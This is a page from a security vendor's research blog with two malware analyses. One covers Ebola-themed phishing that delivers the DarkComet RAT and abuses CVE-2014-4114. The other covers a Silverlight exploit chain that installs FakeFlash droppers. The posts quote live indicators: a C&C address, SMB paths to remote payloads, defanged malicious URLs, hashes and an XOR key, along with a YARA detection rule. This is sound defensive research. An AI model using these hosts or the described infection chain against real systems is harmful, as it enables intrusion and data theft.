News Categories
(34)Malware (39)Malicious emails (11)Web 2.0 (24)Facebook (22)Social Networks (44)Spam (2)Defensio (1)Comment Spam (15)Phishing (9)Web spam (4)Click-jacking (38)Compromise (20)Analysis (38)Exploits (14)Research (3)Presentations (3)Conferences (4)security conference (9)Mass Injection (10)Rogue AV (4)Blackhat SEO (2)Neosploit (23)Targeted attacks (7)Video (14)Zeus (5)Microsoft (4)Monthly Reports (1)twitter (3)Google (18)Vulnerabilities (9)Adobe (12)Java (4)Mobile (4)Apple (1)hacked (1)TAB (1)Black Hat USA 2011 (1)Google+ (20)0-day (1)CVE-2010-2884 (1)CVE-2011-1255 (1)Worm (14)Blackhole exploit kit (1)Incognit Exploit kit (2)Tuesday Patch (6)APT (6)Typosquatting (3)Vulnerability Analysis (1)CVE-2011-3402 (4)Web Research (4)Predictions (3)Adult (5)News (3)Black Hat SEO (6)Data loss (8)Scam (1)QR codes (6)Twitter (1)CVE-2012-0003 (1)CVE-2011-3389 (1)CVE-2012-0004 (1)Phoenix Exploit Kit (1)CrimePack (3)Reverse Engineering (2)Captcha (1)Valentine's day (2)Kelihos (1)SC Magazine Award Winner (1)Wordpress (1)MS12-010 (1)CVE-2012-0002 (1)Infosec (2)CVE-2012-0507 (8)Toolkits (1)Skywiper (2)Flame (1)Flamer (2)Passwords (1)freedom of expression (1)censorship (2)Plugins (3)Malvertising (14)Exploit (1)CVE-2012-1723 (1)CSI (2)ThreatSeeker (2)Adventures in Spam (1)CVE-2012-4681 (1)LBS (2)RAT (1)module Apache/2 (1)Cyber Monday (1)Black Friday (1)Pastebin (4)CVE-2012-4792 (1)iPad (1)super bowl (1)iPhone (2)iOS (4)Spear Phishing (1)Threat Report (3)ThreatScope (1)Dynamic DNS (1)China (1)SSL (1)APT1 (2)DLP (3)Hack (1)CVE-2012-4969 (2)threat lifecycle (1)ThreatSeeker Network (1)ACE (10)exploit kit (1)blackhole (2)Black Hole (1)DNS poisoning (1)RedKit Exploit Kit (4)exploit kits (1)threat stages (1)Certificates (1)Topical (1)Waterhole (1)CVE-2013-2463 (1)Neutrino exploit kit (1)CVE-2013-2473 (1)CVE-2013-3893 (2)Collective Threat Intelligence (1)CVE-2013-3963 (1)Targeted Attack (3)Advanced Malware (1)CVE-2013-3897 (1)Tor (5)cyber-crime (1)Mevade (2)Ransomware (3)Social Engineering (1)CookieBomb (2)LinkedIn (1)CVE-2013-3906 (2)Pony (3)Cryptolocker (2)Upatre (1)application telemetry (1)meta-data (3)dr. watson (1)windows error reporting (1)big data (2)data theft prevention (1)DTP (1)telemetry (2)CVE-2014-0322 (2)MSIE 0-day (1)Deputy Dog (1)Ephemeral Hydra (1)CVE-2013-0074 (1)CVE-2013-3896 (1)Silverlight (2)crash reports (1)POS (1)anomaly detection (1)goon (4)angler (1)ru:8080 (1)magnitude (3)flash (1)CVE-2013-2465 (1)malicious iframes (1)FIESTA (1)Exploits Kit (1)iframe (3)CVE-2014-0160 (2)OpenSSL (3)Heartbleed (3)Citadel (2)CVE-2014-1776 (1)VGX.DLL (1)necrus (1)cutwail (2)gameover (3)vulnerability (3)zbot (1)control panel (1)carberp (1)zberp (1)Caphaw (2)Nuclear exploit kit (1)Shylock (1)Dragonfly (1)Zeus PIF (1)bitly (1)fraud (2)RIG Exploit Kit (1)POS malware (1)Point Of Sale Malware (1)Ukraine (1)Russia (1)Shellshock (1)CVE-2014-6271 (1)poodle (1)cve-2014-3566 (1)sslv3 (1)Ebola (1)CVE-2014-4114 (1)CPA (1)Regin (1)CVE-2015-0311 (1)CVE-2015-0235 (1)linux (1)GHOST (1)CVE-2015-0072 (1)Internet Explorer (1)XSS (1)IE (1)TorrentLocker (1)Product Information (1)Money Laundering (1)APSA10-05 (1)Skype spam
RSS Feed
News
Oct
23
Ebola Spreads - In Cyber Attacks Too
Posted by uwang on 23 October 2014 12:08 PM

The Ebola virus has been spreading in West Africa since first appearing in Guinea in December, 2013. Its rising rate of infection, high mortality rate, and challenging isolation and containment requirements have raised world-wide alarm.

 

Against that backdrop, Websense® Security Labs has found two distinct malicious campaigns that take advantage of the Ebola issue, and it's probably safe to assume that the topic will continue to be abused in the future.

 

DarkKomet RAT/Backdoor Campaign

Beginning October 10, 2014, Websense® ThreatSeeker® Intelligence Cloud has detected thousands of malicious emails taking advantage of the Ebola topic. The subject line is:


  • Subject: Ebola Safety Tips-By WHO

 

At the beginning of the campaign, the messages contained a redirect URL that led victims to a download location for a RAR archive. The archive contained the DarkKomet RAT/Backdoor. DarkKomet is a Remote Administration Tool (RAT) that provides full access to remote clients. It is used by attackers to control the victim's computer and steal information. In more recent emails, the campaign evolved to include direct attachment of executables, and then to direct attachment of a RAR archive containing the executable. The sample below shows the RAR attachment variant.




The malware in this campaign contacted a server located in Romania: 5.254.112.46:1604

ThreatScope has identified malware samples as malicious. Here are two file variants in the campaign:

SHA1 : e2bdede8375da63998562f55a77d4b078d3b5646     ThreatScope Analysis Report : Link

SHA1 : 91ff874eb5bde1bb6703e01d7603d3126ddd01fc       ThreatScope Analysis Report : Link

 

 

CVE-2014-4114 & CVE-2014-6352 - Windows OLE Remote Code Execution Vulnerabilities


On October 14, 2014, iSIGHT discovered vulnerability CVE-2014-4114, used in the Sandworm campaign that targeted NATO, the European Union, and members of the Telecommunications and Energy sectors. CVE-2014-4114 can allow remote code execution if a user opens a specially crafted Microsoft Office file containing an OLE object. The vulnerability is in all supported releases of Microsoft Windows, excluding Windows Server 2003. Because the vulnerability does not involve memory corruption that can result in shellcode, and because it is in the category of 'design error', protection methods like DEP and ASLR are not effective. Example exploit code for CVE-2014-4114 has been spotted posted on the web. Criminal actors could potentially use it to build a vulnerable PowerPoint file to spread the malware. Also, shortly after the disclosure of CVE-2014-4114, a very similar vulnerability that also targets OLE objects, surfaced  and is described as CVE-2014-6532. While CVE-2014-4114 has been patched by Microsoft, CVE-2014-6532 still awaits a patch.

 

Websense® Security Labs has noticed that the Ebola topic has been abused in relation to CVE-2014-4114. A sample from a third-party source, named "Ebola in American.pps", was leveraging CVE-2014-4114 to download and execute a payload from a remote address via the SMB protocol, which most of the time isn't allowed to connect to public Internet addresses.

 

  • \\220.135.249.228\public\install.inf
  • \\220.135.249.228\public\word.exe

 

It is possible to detect CVE-2014-6352 using Yara. Here is a Yara rule that can be run against Microsoft Office files to surface the vulnerability. The rule could use a bit of tweaking and expanding to include INF files:

 

rule cve_2014_6352

{
strings:

        $rootentry = {52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00}

        $ole10native = {4F 00 ( 4C | 6C ) 00 ( 45 | 65 ) 00 31 00 30 00 4E 00 61 00 74 00 69 00 76 00 65 00 00}

        $c = "This program cannot be run in DOS mode"


condition:

    ($rootentry or $ole10native) and $c

}

 

Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the different stages of the attack detailed below:

 

  • Stage 2 (Lure) – ACE protects against lure email messages and URLs containing the threat.
  • Stage 4 (Exploit) – ACE has real-time detection for exploit code that attempts to deliver the threat.
  • Stage 5 (Dropper) – ACE has detection for the malicious files delivered by this threat.
  • Stage 6 (Call Home) – ACE detects the communication to the associated C&C points associated with this threat.

 

Blog contributors: Ulysses Wang, Ran Mosessco, Nicholas Griffin.

 

 


Read more »



Feb
14
FakeFlash Installation via Silverlight
Posted by Jose Barajas on 14 February 2014 05:15 PM

Using  the Websense® ThreatSeeker® Intelligence Cloud , Websense Security Labs researchers have discovered attempts to infect users using the commonly distributed plug-in, Silverlight. Silverlight allows development of web and mobile applications that consist of streaming media, multimedia, graphics, and animation. It has been used for video streaming of events such as the 2008 Summer Olympics in Beijing, the 2010 Winter Olympics in Vancouver, and the 2008 conventions of both major United States political parties. Streaming services such as Netflix use Silverlight for Digital Rights Management (DRM). By leveraging two Silverlight plug-in vulnerabilities, CVE-2013-3896 and CVE-2013-0074, attackers have been able to infect victims via dropper files and subsequently through calls home to the command and control (C&C) server.

We will analyze this malicious campaign and explain how it goes from generating the first dropper file to calling home for additional binaries. The infection begins with the following:

1. Silverlight object with "param" value
The infected URL hxxp://philelec.be/VZX.html hosts code which calls Java and Silverlight content including a parameter value. The Silverlight file makes use of vulnerabilities CVE-2013-3896 and CVE-2013-0074. Leveraging the ability to execute arbitrary code, the param values are read and executed.



2. Base64 encoded Visual Basic Script
The param value loaded with the plug-in is a Base64 encoded Visual Basic Script (VBS). Silverlight generates the VBS file and places it in the directory C:\Users\<user name>\AppData\Local\Temp\Log. Please note the following code:



The downloaded binary is encrypted with the XOR key “m3S4V”. Using the ADODB.Stream ability to read and write text and binary files, a file named 4bb213.exe is created and run.

3. Call home for dropper file
Upon execution, the file makes two calls to the bot network server hxxp://cc9966.com/. The queries included in the call contain the current version of Windows on the infected machine. In our ACE Insight report , the query os=5.1.2600_2.0_32 lets the server know the system is Windows XP 32-bit. Once the OS version is known, a dropper file is downloaded from hxxp://cc9966.com/clk.



4. Additional dropper downloads
Additional binaries are then downloaded from the URL hxxp://net-translscl.com/b/shoe/456.




http://csi.websense.com/ThreatScope/FileAnalysis?requestId=35f12d05-ddc1-4cb5-a104-a2cb00b84a53
http://csi.websense.com/ThreatScope/FileAnalysis?requestId=15e9c86c-fee4-4962-a906-a2cb00b844d9

5. FakeFlash update installation
Lastly a FakeFlash update file is installed. Once that is complete, one last file is run.



The Windows batch file makes final changes and restarts the user machine.



At the time of initial investigation, fewer than 10% of AV vendors had detection for the malicious files. The dropper files involved in this campaign are currently being identified as a Trojan threat by AV vendors. Based on call back activity, infected machines may be updated with additional dropper files by the C&C server when communication is established.

The C&C server hosting the dropper file was registered via a domain privacy provider, while the resolving IP address is owned by the hosting provider 3NT Solutions. Communication attempts to the C&C server have been observed from the following countries:



While Silverlight is not commonly used for business purposes, its use for web applications and streaming gives it a strong presence on devices owned by everyday users. With many companies embracing BOYD policies, applications such as Silverlight provide malicious actors with another potential cyber-attack vector.

Websense customers are protected with ACE™, our Advanced Classification Engine, at the stages detailed below:

  • Stage 3 (Exploit Kit) – ACE has detection for the malicious code which attempts to execute this cyber-attack.
  • Stage 5 (Dropper Files) – ACE has detection for the binary files associated with this attack. Additionally, ThreatScope behavioral analysis classifies the binary's behavior as malicious or suspicious.
  • Stage 6 (Call Home) – Communication to the associated C&C server is prevented.

Read more »